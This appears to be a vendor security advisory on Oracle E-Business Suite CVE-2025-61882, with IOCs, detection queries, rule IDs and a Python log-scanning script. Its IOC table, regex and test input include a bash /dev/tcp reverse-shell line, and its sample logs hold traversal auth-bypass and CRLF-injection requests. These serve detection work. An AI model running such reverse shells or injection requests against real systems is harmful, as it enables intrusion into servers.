The attack chain for CVE-2025-61882 consists of several stages, each relying on a different vulnerability or technique, which together lead to remote code execution (RCE):
  • Server-Side Request Forgery (SSRF)
  • Carriage Return/Line Feed (CRLF) Injection 
  • HTTP Persistent Connections
  • Authentication Filter Bypass
  • XSL Transformation (XSLT)

Impacted versions of Oracle E-Business Suite are 12.2.3 through 12.2.14. Oracle advises customers to contact their authorized support provider as soon as possible to obtain and apply the necessary patches.

Oracle has provided a handful of Indicators of Compromise (IOCs) that may help investigate potential exposure:

Indicator | Type | Description
200[.]107[.]207[.]26 | IP | Potential GET and POST activity
185[.]181[.]60[.]11 | IP | Potential GET and POST activity
sh -c /bin/bash -i >& /dev/tcp// 0>&1 | Command | Establish an outbound TCP connection over a specific port (host and port omitted in the published IOC)
76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA-256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip
aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA-256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py
6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA-256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py

Trend Micro Investigation, Protection and Detection Against Exploitation

In addition to the Oracle critical patches, which should be applied as soon as possible, Trend Micro has released updates and proactive rules/filters that provide additional protection against potential exploits, as well as tools customers can use to investigate potential exposure to these vulnerabilities.

Trend Vision One

Threat Insights

Trend Vision One Threat Insights provides threat intelligence curated by Trend Micro experts, with timely reports on emerging threats that administrators can base critical security decisions on.

Search Query

Customers may use the General Search Query function in Vision One for a preliminary investigation of potential exposure with the following queries:

Suspicious Outbound Connection
eventSubId:204 AND (dst:185.181.60.11 OR dst:200.107.207.26)

Detect outbound HTTP(S) connections from the Oracle EBS server (oacore process) to external, non-allowlisted IPs. As written, the query excludes only 10.0.0.0/8 and 192.168.0.0/16; add your own internal ranges (for example 172.16.0.0/12) to avoid noise.
eventId:3 AND eventSubId:204 AND processFilePath:*oacore* AND NOT objectIp:10.* AND NOT objectIp:192.168.*

CVE202561882 Artifact Detection
malName:*Python.CVE202561882* AND eventName:MALWARE_DETECTION AND LogType: detection

Detect requests or file access attempts to /OA_HTML/help/../ieshostedsurvey.jsp for auth bypass and exploitation
eventId:3 AND eventSubId:204 AND request:*OA_HTML/help/../ieshostedsurvey.jsp*

Detect HTTP POST requests to vulnerable UiServlet endpoint, indicating SSRF activity
eventId:3 AND eventSubId:204 AND request:*configurator/UiServlet*
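For environments without Vision One, the same indicators from the Oracle IOC table and the search queries above can be checked directly against web server access logs and process command lines. The script below is an added example, not code from Trend Micro or Oracle: it assumes an Apache/OHS-style combined access-log format, uses constructed sample lines (RFC 5737 test addresses plus the two listed IOC IPs), and the indicator labels (ioc-source-ip, uiservlet-post, auth-filter-bypass, crlf-injection) are names chosen here. It resolves `..` in request paths before comparison, so the `/OA_HTML/help/../ieshostedsurvey.jsp` pattern is caught whichever prefix the traversal hides behind.

```python
import hashlib
import posixpath
import re
from urllib.parse import unquote

# Indicators copied from the Oracle IOC table above (defanging removed).
IOC_IPS = {"200.107.207.26", "185.181.60.11"}
IOC_SHA256 = {
    "76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d":
        "oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip",
    "aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121": "exp.py",
    "6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b": "server.py",
}
# Reverse-shell fragment from the IOC table; the published IOC omits host and port.
REVERSE_SHELL = re.compile(r"/bin/bash -i >& /dev/tcp/")
# Path the auth-bypass search query looks for, once the "help/.." traversal is resolved.
BYPASS_TARGET = "/OA_HTML/ieshostedsurvey.jsp"

# Assumed log format: Apache/OHS "combined" style access log.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample lines: RFC 5737 test addresses plus the two listed IOC IPs.
SAMPLE_LOG = """\
203.0.113.7 - - [06/Oct/2025:10:00:01 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 1234
200.107.207.26 - - [06/Oct/2025:10:00:02 +0000] "POST /OA_HTML/configurator/UiServlet HTTP/1.1" 200 512
200.107.207.26 - - [06/Oct/2025:10:00:03 +0000] "GET /OA_HTML/help/../ieshostedsurvey.jsp HTTP/1.1" 200 4096
198.51.100.9 - - [06/Oct/2025:10:00:04 +0000] "GET /OA_HTML/help/%0d%0aX-Injected:%201 HTTP/1.1" 400 0
"""


def classify_request(method, raw_path):
    """Return the indicator labels (names assumed here) matched by one request line."""
    hits = []
    decoded = unquote(raw_path.split("?", 1)[0])
    # CRLF injection: URL-encoded %0d%0a survives in the log and decodes to \r\n.
    if "\r" in decoded or "\n" in decoded:
        hits.append("crlf-injection")
    # Resolve "..": a filter that checks the raw prefix (e.g. /OA_HTML/help/)
    # sees a different path than the one the server ultimately serves.
    normalized = posixpath.normpath(decoded)
    if "/../" in decoded:
        hits.append("auth-filter-bypass" if normalized == BYPASS_TARGET else "path-traversal")
    # The SSRF search query keys on POST requests to configurator/UiServlet.
    if method == "POST" and normalized.endswith("/configurator/UiServlet"):
        hits.append("uiservlet-post")
    return hits


def scan_access_log(lines):
    """Parse access-log lines and return only those matching at least one indicator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = ["ioc-source-ip"] if m["src"] in IOC_IPS else []
        hits += classify_request(m["method"], m["path"])
        if hits:
            findings.append({"src": m["src"], "method": m["method"],
                             "path": m["path"], "hits": hits})
    return findings


def is_reverse_shell(cmdline):
    """True if a process command line carries the /dev/tcp reverse-shell fragment."""
    return REVERSE_SHELL.search(cmdline) is not None


def match_sha256(data):
    """Return the IOC file name if data hashes to one of the listed SHA-256 values."""
    return IOC_SHA256.get(hashlib.sha256(data).hexdigest())


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG.splitlines()):
        print(f"{f['src']:16} {f['method']:4} {f['path']:45} {', '.join(f['hits'])}")
    print(is_reverse_shell("sh -c /bin/bash -i >& /dev/tcp/203.0.113.5/4444 0>&1"))
```

Run it against a real access log by replacing `SAMPLE_LOG.splitlines()` with the file's lines; `is_reverse_shell` is meant for process-creation or shell-history records, and `match_sha256` for the bytes of any suspicious archive or `.py` found on the host.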

Utilizing Observed Attack Techniques (OAT)

Vision One customers using Trend Micro endpoint and server protection products can check the Observed Attack Techniques section of the Vision One console for suspicious activity that may indicate malicious behavior associated with this threat.

Potential indicators include:

  • Oracle E-Business Suite CRLF Injection Vulnerability (CVE-2025-61882)
  • Oracle E-Business Suite Vulnerability (CVE-2025-61882)
  • CVE-2025-61882 Oracle Remote Code Execution Exploit HTTP (Request) - Outbound
  • CVE-2025-61882 Oracle Remote Code Execution Exploit HTTP (Request) - Inbound
  • Creation or Modification of Suspicious Java Files in Oracle Directories

Trend Vision One Endpoint Security

Trend Vision One - Endpoint Security, Deep Security & Vulnerability Protection IPS Rules

  • 1012464 - Oracle E-Business Suite CRLF Injection Vulnerability (CVE-2025-61882)

Trend Vision One Network Security

TippingPoint and Trend Cloud One - Network Security Filters

  • 46513: HTTP: Oracle E-Business Suite Concurrent Processing Pre-Auth Command Execution Vulnerability

Trend Micro Deep Discovery Inspector (DDI) Rules

  • 5536: CVE-2025-61882_HTTP_ORACLE_RCE_EXPLOIT_REQUEST_SB

Patterns, Models, Signatures

Trend Micro Endpoint and Server Malware Pattern (VSAPI) Detection

Trend Micro products that use pattern-based, behavior monitoring and other advanced detection technologies can also detect and protect against the following known malicious components associated with in-the-wild exploits:

  • Backdoor.Python.CVE202561882.A

Trend Micro Web Reputation Services (WRS)

Trend Micro is also blocking several known C&C server and Disease Vector IPs and domains known to be associated with these exploits.